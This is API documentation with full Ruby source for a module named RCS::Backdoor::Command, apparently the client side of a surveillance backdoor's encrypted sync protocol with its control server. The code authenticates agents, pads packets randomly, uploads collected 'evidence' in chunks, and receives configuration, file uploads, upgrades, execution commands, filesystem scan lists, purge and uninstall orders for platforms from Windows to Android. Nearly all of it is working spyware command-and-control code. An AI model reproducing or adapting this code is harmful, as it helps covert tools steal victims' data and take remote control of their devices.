Module: RCS::Backdoor::Command

Includes:

Crypt, Tracer

Included in:

Protocol

Defined in:

lib/rcs-backdoor/command.rb

Constant Summary

INVALID_COMMAND =

Don’t use

0x00

PROTO_OK =

OK

0x01

PROTO_NO =

Nothing available

0x02

PROTO_BYE =

The end of the protocol

0x03

PROTO_ID =

Identification of the target

0x0f

PROTO_CONF =

New configuration

0x07

PROTO_UNINSTALL =

Uninstall command

0x0a

PROTO_DOWNLOAD =

List of files to be downloaded

0x0c

PROTO_UPLOAD =

A file to be saved

0x0d

PROTO_UPGRADE =

Upgrade for the agent

0x16

PROTO_EVIDENCE =

Upload of an evidence

0x09

PROTO_EVIDENCE_CHUNK =

Upload of an evidence (in chunks)

0x10

PROTO_EVIDENCE_SIZE =

Queue for evidence

0x0b

PROTO_FILESYSTEM =

List of paths to be scanned

0x19

PROTO_PURGE =

purge the log queue

0x1a

PROTO_EXEC =

execution of commands during sync

0x1b

PLATFORMS =

["WINDOWS", "WINMO", "OSX", "IOS", "BLACKBERRY", "SYMBIAN", "ANDROID", "LINUX"]

Instance Method Summary

• #authenticate(backdoor) ⇒ Object

  the commands are depicted here: rcs-dev/trac/wiki/RCS_Sync_Proto_Rest.

• #authenticate_elite(backdoor) ⇒ Object

  Authentication phase -> Crypt_C ( Kd, NonceDevice, BuildId, InstanceId, SubType, sha1 ( BuildId, InstanceId, SubType, Cb ) ) <- [ Crypt_C ( Ks ), Crypt_K ( NonceDevice, Response ) ] | SetCookie ( SessionCookie ).

• #authenticate_scout(backdoor) ⇒ Object

  Authentication phase -> Base64 ( Crypt_S ( Pver, Kd, sha(Kc | Kd), BuildId, InstanceId, Platform ) ) <- Base64 ( Crypt_C ( Ks, sha(K), Response ) ) | SetCookie ( SessionCookie ).

• #bye ⇒ Object

  Protocol End -> Crypt_K ( PROTO_BYE ) <- Crypt_K ( PROTO_OK ).

• #normalize(content) ⇒ Object

  normalize a message, cutting at the shorter size multiple of 16.

• #randblock ⇒ Object

  returns a random block of random size < 16.

• #receive_config(backdoor) ⇒ Object

  Protocol Conf -> Crypt_K ( PROTO_CONF ) <- Crypt_K ( PROTO_NO | PROTO_OK [ Conf ] ).

• #receive_downloads ⇒ Object

  Protocol Download -> Crypt_K ( PROTO_DOWNLOAD ) <- Crypt_K ( PROTO_NO | PROTO_OK [ numElem, [file1, file2, …]] ).

• #receive_exec ⇒ Object

  Protocol Exec -> Crypt_K ( PROTO_EXEC ) <- Crypt_K ( PROTO_NO | PROTO_OK [ numElem, [file1, file2, …]] ).

• #receive_filesystems ⇒ Object

  Protocol Filesystem -> Crypt_K ( PROTO_FILESYSTEM ) <- Crypt_K ( PROTO_NO | PROTO_OK [ numElem,[ depth1, dir1, depth2, dir2, … ]] ).

• #receive_purge ⇒ Object

  Protocol Purge -> Crypt_K ( PROTO_PURGE ) <- Crypt_K ( PROTO_NO | PROTO_OK [ time, size ] ).

• #receive_upgrade ⇒ Object

  Protocol Upgrade -> Crypt_K ( PROTO_UPGRADE ) <- Crypt_K ( PROTO_NO | PROTO_OK [ left, filename, content ] ).

• #receive_uploads ⇒ Object

  Protocol Upload -> Crypt_K ( PROTO_UPLOAD ) <- Crypt_K ( PROTO_NO | PROTO_OK [ left, filename, content ] ).

• #send_command(command, payload = nil) ⇒ Object

  helper method.

• #send_evidence(evidences) ⇒ Object

  Protocol Evidence -> Crypt_K ( PROTO_EVIDENCE [ size, content ] ) <- Crypt_K ( PROTO_OK | PROTO_NO ).

• #send_evidence_chunk(evidence) ⇒ Object

  Protocol Evidence (with resume in chunk) -> PROTO_EVIDENCE_CHUNK [ id, base, chunk, size, content ] <- PROTO_OK [ base ] | PROTO_NO.

• #send_evidence_size(evidences) ⇒ Object

  Protocol Evidence -> Crypt_K ( PROTO_EVIDENCE_SIZE [ num, size ] ) <- Crypt_K ( PROTO_OK ).

• #send_id(backdoor) ⇒ Object

  -> Crypt_K ( PROTO_ID [Version, UserId, DeviceId, SourceId] ) <- Crypt_K ( PROTO_OK, Time, Availables ).

Instance Method Details

#authenticate(backdoor) ⇒ Object

the commands are depicted here: rcs-dev/trac/wiki/RCS_Sync_Proto_Rest

# File 'lib/rcs-backdoor/command.rb', line 47

def authenticate(backdoor)
  # use the correct auth packet
  (backdoor.scout or backdoor.soldier) ? authenticate_scout(backdoor) : authenticate_elite(backdoor)
end

#authenticate_elite(backdoor) ⇒ Object

Authentication phase -> Crypt_C ( Kd, NonceDevice, BuildId, InstanceId, SubType, sha1 ( BuildId, InstanceId, SubType, Cb ) )

<- [ Crypt_C ( Ks ), Crypt_K ( NonceDevice, Response ) ] | SetCookie ( SessionCookie )

# File 'lib/rcs-backdoor/command.rb', line 55

def authenticate_elite(backdoor)
  trace :info, "AUTH"
   
  # first part of the session key, chosen by the client
  # it will be used to derive the session key later along with Ks (server chosen)
  # and the Cb (pre-shared conf key)
  kd = SecureRandom.random_bytes(16)
  trace :debug, "Auth -- Kd: " << kd.unpack('H*').to_s
  
  # the client NOnce that has to be returned by the server
  # this is used to authenticate the server 
  # returning it crypted with the session key it will confirm the 
  # authenticity of the server 
  nonce = SecureRandom.random_bytes(16)
  trace :debug, "Auth -- Nonce: " << nonce.unpack('H*').to_s
      
  # the id and the type are padded to 16 bytes
  rcs_id = backdoor.id.ljust(16, "\x00")
  rcs_type = backdoor.type.ljust(16, "\x00")
  
  # backdoor identification
  # the server will calculate the same sha digest and authenticate the backdoor
  # since the conf key is pre-shared
  sha = Digest::SHA1.digest(rcs_id + backdoor.instance + rcs_type + backdoor.conf_key)
  trace :debug, "Auth -- sha: " << sha.unpack('H*').to_s
  
  # prepare and encrypt the message
  message = kd + nonce + rcs_id + backdoor.instance + rcs_type + sha    
  #trace "Auth -- message: " << message.unpack('H*').to_s
  enc_msg = aes_encrypt(message, backdoor.signature)
  #trace "Auth -- signature: " << backdoor.signature.unpack('H*').to_s
  #trace "Auth -- enc_message: " << enc_msg.unpack('H*').to_s

  # add randomness to the packet size
  enc_msg += randblock()

  # send the message and receive the response from the server
  # the transport layer will take care of the underlying cookie
  resp = @transport.message enc_msg

  # remove the random bytes at the end
  resp = normalize(resp)

  # sanity check
  raise "wrong auth response length" unless resp.length == 64
  
  # first 32 bytes are the Ks choosen by the server
  # decrypt it and store to create the session key along with Kd and Cb
  ks = resp.slice!(0..31)
  ks = aes_decrypt(ks, backdoor.signature)
  trace :debug, "Auth -- Ks: " << ks.unpack('H*').to_s
  
  # calculate the session key ->  K = sha1(Cb || Ks || Kd) 
  # we use a schema like PBKDF1
  # remember it for the entire session
  @session_key = Digest::SHA1.digest(backdoor.conf_key + ks + kd)
  trace :debug, "Auth -- K: " << @session_key.unpack('H*').to_s
  
  # second part of the server response contains the NOnce and the response
  tmp = aes_decrypt(resp, @session_key)
  
  # extract the NOnce and check if it is ok
  # this MUST be the same NOnce sent to the server, but since it is crypted
  # with the session key we know that the server knows Cb and thus is trusted
  rnonce = tmp.slice!(0..15)
  trace :debug, "Auth -- rnonce: " << rnonce.unpack('H*').to_s
  raise "Invalid NOnce" unless nonce == rnonce
  
  # extract the response
  response = tmp
  trace :debug, "Auth -- Response: " << response.unpack('H*').to_s
  
  # print the response
  trace :info, "Auth Response: OK" if response.unpack('I') == [PROTO_OK]
  if response.unpack('I') == [PROTO_UNINSTALL]
    trace :info, "UNINSTALL received"
    raise "UNINSTALL"
  end
  if response.unpack('I') == [PROTO_NO]
    trace :info, "NO received"
    raise "PROTO_NO: cannot continue"
  end
end

#authenticate_scout(backdoor) ⇒ Object

Authentication phase -> Base64 ( Crypt_S ( Pver, Kd, sha(Kc | Kd), BuildId, InstanceId, Platform ) ) <- Base64 ( Crypt_C ( Ks, sha(K), Response ) ) | SetCookie ( SessionCookie )

# File 'lib/rcs-backdoor/command.rb', line 142

def authenticate_scout(backdoor)
  trace :info, "AUTH SCOUT"

  # the version of the protocol
  pver = [1].pack('I')

  # first part of the session key, chosen by the client
  # it will be used to derive the session key later along with Ks (server chosen)
  # and the Cb (pre-shared conf key)
  kd = SecureRandom.random_bytes(16)
  trace :debug, "Auth -- Kd: " << kd.unpack('H*').to_s

  # authentication sha
  sha = Digest::SHA1.digest(backdoor.conf_key + kd)
  trace :debug, "Auth -- sha: " << sha.unpack('H*').to_s

  # the id and the type are padded to 16 bytes
  rcs_id = backdoor.id.ljust(16, "\x00")
  demo = (backdoor.type.end_with? '-DEMO') ? "\x01" : "\x00"
  level = "\x01" if backdoor.scout
  level = "\x02" if backdoor.soldier
  flags = "\x00"

  platform = [PLATFORMS.index(backdoor.type.gsub(/-DEMO/, ''))].pack('C') + demo + level + flags

  trace :debug, "Auth -- #{backdoor.type} " << platform.unpack('H*').to_s

  # prepare and encrypt the message
  message = pver + kd + sha + rcs_id + backdoor.instance + platform
  #trace "Auth -- message: " << message.unpack('H*').to_s
  enc_msg = aes_encrypt(message, backdoor.signature, PAD_NOPAD)
  #trace "Auth -- signature: " << backdoor.signature.unpack('H*').to_s
  #trace "Auth -- enc_message: " << enc_msg.unpack('H*').to_s

  # add the random block
  enc_msg += SecureRandom.random_bytes(rand(128..1024))

  # add the base64 container
  enc_msg = Base64.strict_encode64(enc_msg)

  # send the message and receive the response from the server
  # the transport layer will take care of the underlying cookie
  resp = @transport.message enc_msg

  # remove the base64 container
  resp = Base64.strict_decode64(resp)

  # align to the multiple of 16
  resp = normalize(resp)

  # decrypt the message
  resp = aes_decrypt(resp, backdoor.conf_key, PAD_NOPAD)

  ks = resp.slice!(0..15)
  trace :debug, "Auth -- Ks: " << ks.unpack('H*').to_s

  # calculate the session key ->  K = sha1(Cb || Ks || Kd)
  # we use a schema like PBKDF1
  # remember it for the entire session
  @session_key = Digest::SHA1.digest(backdoor.conf_key + ks + kd)
  trace :debug, "Auth -- K: " << @session_key.unpack('H*').to_s

  check = resp.slice!(0..19)
  raise "Invalid session key (K)" if check != Digest::SHA1.digest(@session_key + ks)

  trace :debug, "Auth -- Response: " << resp.slice(0..3).unpack('H*').to_s

  # print the response
  trace :info, "Auth Response: OK" if resp.unpack('I') == [PROTO_OK]
  if resp.unpack('I') == [PROTO_UNINSTALL]
    trace :info, "UNINSTALL received"
    raise "UNINSTALL"
  end
  if resp.unpack('I') == [PROTO_NO]
    trace :info, "NO received"
    raise "PROTO_NO: cannot continue"
  end
end

#bye ⇒ Object

Protocol End -> Crypt_K ( PROTO_BYE )

<- Crypt_K ( PROTO_OK )

# File 'lib/rcs-backdoor/command.rb', line 527

def bye
  trace :info, "BYE"
  resp = send_command(PROTO_BYE)
  
  trace :info, "BYE Response: OK" if resp.unpack('I') == [PROTO_OK]
end

#normalize(content) ⇒ Object

normalize a message, cutting at the shorter size multiple of 16

# File 'lib/rcs-backdoor/command.rb', line 559

def normalize(content)
  newlen = content.length - (content.length % 16)
  content[0..newlen-1]
end

#randblock ⇒ Object

returns a random block of random size < 16

# File 'lib/rcs-backdoor/command.rb', line 554

def randblock()
  return SecureRandom.random_bytes(SecureRandom.random_number(16))
end

#receive_config(backdoor) ⇒ Object

Protocol Conf -> Crypt_K ( PROTO_CONF ) <- Crypt_K ( PROTO_NO | PROTO_OK [ Conf ] )

# File 'lib/rcs-backdoor/command.rb', line 275

def receive_config(backdoor)
  trace :info, "CONFIG"
  resp = send_command(PROTO_CONF)

  # decode the response
  command, size = resp.unpack('I2')
  if command == PROTO_OK then
    trace :info, "CONFIG -- #{size} bytes"
    # configuration parser
    config = RCS::Config.new(backdoor, resp[8..-1])
    config.dump_to_file
    # we have received the config correctly
    send_command(PROTO_CONF, [PROTO_OK].pack('I'))
  else
    trace :info, "CONFIG -- no new conf"  
  end
end

#receive_downloads ⇒ Object

Protocol Download -> Crypt_K ( PROTO_DOWNLOAD )

<- Crypt_K ( PROTO_NO | PROTO_OK [ numElem, [file1, file2, …]] )

# File 'lib/rcs-backdoor/command.rb', line 340

def receive_downloads
  trace :info, "DOWNLOAD"
  resp = send_command(PROTO_DOWNLOAD)
  
  # decode the response
  command, tot, num = resp.unpack('I3')

  if command == PROTO_OK then
    trace :info, "DOWNLOAD : #{num} are available"
    list = resp.slice(12, resp.length)
    # print the list of downloads
    list.unpascalize_ary.each do |pattern|
      trace :info, "DOWNLOAD -- [#{pattern}]"
    end
  else
    trace :info, "DOWNLOAD -- No downloads for me"
  end
end

#receive_exec ⇒ Object

Protocol Exec -> Crypt_K ( PROTO_EXEC ) <- Crypt_K ( PROTO_NO | PROTO_OK [ numElem, [file1, file2, …]] )

# File 'lib/rcs-backdoor/command.rb', line 505

def receive_exec
  trace :info, "EXEC"
  resp = send_command(PROTO_EXEC)

  # decode the response
  command, tot, num = resp.unpack('I3')

  if command == PROTO_OK then
    trace :info, "EXEC : #{num} are available"
    list = resp.slice(12, resp.length)
    # print the list of downloads
    list.unpascalize_ary.each do |command|
      trace :info, "EXEC -- [#{command}]"
    end
  else
    trace :info, "EXEC -- No downloads for me"
  end
end

#receive_filesystems ⇒ Object

Protocol Filesystem -> Crypt_K ( PROTO_FILESYSTEM )

<- Crypt_K ( PROTO_NO | PROTO_OK [ numElem,[ depth1, dir1, depth2, dir2, … ]] )

# File 'lib/rcs-backdoor/command.rb', line 362

def receive_filesystems
  trace :info, "FILESYSTEM"
  resp = send_command(PROTO_FILESYSTEM)
  
  # decode the response
  command, tot, num = resp.unpack('I3')

  if command == PROTO_OK then
    trace :info, "FILESYSTEM : #{num} are available"
    list = resp.slice(12, resp.length)
    # print the list of downloads
    buffer = list
    begin
      depth, len = buffer.unpack('I2')
      # len of the current token
      len += 8
      # unpascalize the token
      str = buffer[4, buffer.length].unpascalize
      trace :info, "FILESYSTEM -- [#{depth}][#{str}]"
      # move the pointer after the token
      buffer = buffer.slice(len, list.length)
    end while buffer.length != 0
  else
    trace :info, "FILESYSTEM -- No filesystem for me"
  end
end

#receive_purge ⇒ Object

Protocol Purge -> Crypt_K ( PROTO_PURGE ) <- Crypt_K ( PROTO_NO | PROTO_OK [ time, size ] )

# File 'lib/rcs-backdoor/command.rb', line 488

def receive_purge
  trace :info, "PURGE"
  resp = send_command(PROTO_PURGE)

  # decode the response
  command, len, time, size = resp.unpack('IIQI')

  if command == PROTO_OK
    trace :info, "PURGE -- [#{Time.at(time)}] #{size} bytes"
  else
    trace :info, "PURGE -- No purge for me"
  end
end

#receive_upgrade ⇒ Object

Protocol Upgrade -> Crypt_K ( PROTO_UPGRADE ) <- Crypt_K ( PROTO_NO | PROTO_OK [ left, filename, content ] )

# File 'lib/rcs-backdoor/command.rb', line 318

def receive_upgrade
  trace :info, "UPGRADE"
  resp = send_command(PROTO_UPGRADE)

  # decode the response
  command, tot, left, size = resp.unpack('I4')
  
  if command == PROTO_OK then
    filename = resp[12, resp.length].unpascalize
    bytes = resp[16 + size, resp.length].unpack('I')
    trace :info, "UPGRADE -- [#{filename}] #{bytes} bytes"
    
    # recurse the request if there are other files to request
    receive_upgrade if left != 0
  else
    trace :info, "UPGRADE -- No upgrade for me"
  end
end

#receive_uploads ⇒ Object

Protocol Upload -> Crypt_K ( PROTO_UPLOAD ) <- Crypt_K ( PROTO_NO | PROTO_OK [ left, filename, content ] )

# File 'lib/rcs-backdoor/command.rb', line 296

def receive_uploads
  trace :info, "UPLOAD"
  resp = send_command(PROTO_UPLOAD)

  # decode the response
  command, tot, left, size = resp.unpack('I4')
  
  if command == PROTO_OK then
    filename = resp[12, resp.length].unpascalize
    bytes = resp[16 + size, resp.length].unpack('I')
    trace :info, "UPLOAD -- [#{filename}] #{bytes} bytes"
    
    # recurse the request if there are other files to request
    receive_uploads if left != 0
  else
    trace :info, "UPLOAD -- No uploads for me"
  end
end

#send_command(command, payload = nil) ⇒ Object

helper method

# File 'lib/rcs-backdoor/command.rb', line 535

def send_command(command, payload = nil)
  message = [command].pack('I')
  message += payload unless payload.nil?
  
  # encrypt the message
  enc_msg = aes_encrypt_integrity(message, @session_key)
  enc_msg += randblock()

  # send the message and receive the response
  resp = @transport.message enc_msg

  # remove the random bytes at the end
  resp = normalize(resp)

  # decrypt it
  return aes_decrypt_integrity(resp, @session_key)
end

#send_evidence(evidences) ⇒ Object

Protocol Evidence -> Crypt_K ( PROTO_EVIDENCE [ size, content ] ) <- Crypt_K ( PROTO_OK | PROTO_NO )

# File 'lib/rcs-backdoor/command.rb', line 412

def send_evidence(evidences)
  
  return if evidences.empty?
  
  # take the first log
  evidence = evidences.shift

  # if the evidence is big, split in chunks
  if evidence.size > 100_000
    send_evidence_chunk(evidence)
  else

    # prepare the message
    message = [PROTO_EVIDENCE].pack('I') + [evidence.size].pack('I') + evidence.binary
    enc_msg = aes_encrypt_integrity(message, @session_key)
    # send the message and receive the response
    resp = @transport.message enc_msg

    # remove the random bytes at the end
    resp = normalize(resp)

    resp = aes_decrypt_integrity(resp, @session_key)

    if resp.unpack('I') == [PROTO_OK]
      trace :info, "EVIDENCE -- [#{evidence.name}] #{evidence.size} bytes sent. #{evidences.size} left"
    else
      trace :info, "EVIDENCE -- problems from server"
      return
    end
  end

  # recurse for the next log to be sent
  send_evidence evidences unless evidences.empty?
end

#send_evidence_chunk(evidence) ⇒ Object

Protocol Evidence (with resume in chunk) -> PROTO_EVIDENCE_CHUNK [ id, base, chunk, size, content ] <- PROTO_OK [ base ] | PROTO_NO

# File 'lib/rcs-backdoor/command.rb', line 450

def send_evidence_chunk(evidence)

  id = 0
  base = 0
  chunk = 50_000

  binary = StringIO.open(evidence.binary, "rb")

  while buff = binary.read(chunk)
    chunk = buff.bytesize

    # prepare the message
    message = [PROTO_EVIDENCE_CHUNK].pack('I') +
              [id].pack('I') + [base].pack('I') + [chunk].pack('I') + [evidence.size].pack('I') +
              buff

    # send the message and receive the response
    enc_msg = aes_encrypt_integrity(message, @session_key)
    resp = @transport.message enc_msg
    # remove the random bytes at the end
    resp = normalize(resp)
    resp = aes_decrypt_integrity(resp, @session_key)

    if resp.slice!(0..3).unpack('I') == [PROTO_OK]
      trace :info, "EVIDENCE -- [#{evidence.name}] #{base}/#{chunk} bytes sent (total #{evidence.size})"
      dummy, base = resp.unpack('I*')
      trace :info, "EVIDENCE -- [#{evidence.name}] acknowledged base: #{base}"
    else
      trace :info, "EVIDENCE -- problems from server"
      return
    end
  end

end

#send_evidence_size(evidences) ⇒ Object

Protocol Evidence -> Crypt_K ( PROTO_EVIDENCE_SIZE [ num, size ] ) <- Crypt_K ( PROTO_OK )

# File 'lib/rcs-backdoor/command.rb', line 393

def send_evidence_size(evidences)

  total_size = 0
  evidences.each do |e|
    total_size += e.size
  end

  trace :info, "EVIDENCE_SIZE: #{evidences.size} (#{total_size.to_s_bytes})"

  # prepare the message
  message = [PROTO_EVIDENCE_SIZE].pack('I') + [evidences.size].pack('I') + [total_size].pack('Q')
  enc_msg = aes_encrypt_integrity(message, @session_key)
  # send the message and receive the response
  @transport.message enc_msg
end

#send_id(backdoor) ⇒ Object

-> Crypt_K ( PROTO_ID [Version, UserId, DeviceId, SourceId] ) <- Crypt_K ( PROTO_OK, Time, Availables )

# File 'lib/rcs-backdoor/command.rb', line 224

def send_id(backdoor)
  trace :info, "ID"
   
  # the array of available commands from server
  available = []
  
  # prepare the command
  message = [PROTO_ID].pack('I')
  
  # prepare the message 
  message += [backdoor.version].pack('I')
  message += backdoor.userid.pascalize + backdoor.deviceid.pascalize + backdoor.sourceid.pascalize

  #trace :debug, "Ident: " << message.unpack('H*').to_s

  # send the message and receive the response from the server
  enc = aes_encrypt_integrity(message, @session_key)
  resp = @transport.message enc

  # remove the random bytes at the end
  resp = normalize(resp)

  resp = aes_decrypt_integrity(resp, @session_key)
  #trace "ID -- response: " << resp.unpack('H*').to_s
  
  # parse the response
  command, tot, time, size, *list = resp.unpack('I2qI*')
  
  # fill the available array
  if command == PROTO_OK then
    trace :info, "ID Response: OK"
    now = Time.now
    diff_time = now.to_i - time
    trace :debug, "ID -- Server Time : " + time.to_s
    trace :debug, "ID -- Local  Time : " + now.to_i.to_s + " diff [#{diff_time}]"
    if size != 0 then
      trace :debug, "ID -- available(#{size}): " + list.to_s
      available = list
    end
  else
    trace :info, "ID Response: " + command.to_s
    raise "invalid response"
  end
  
  return available
end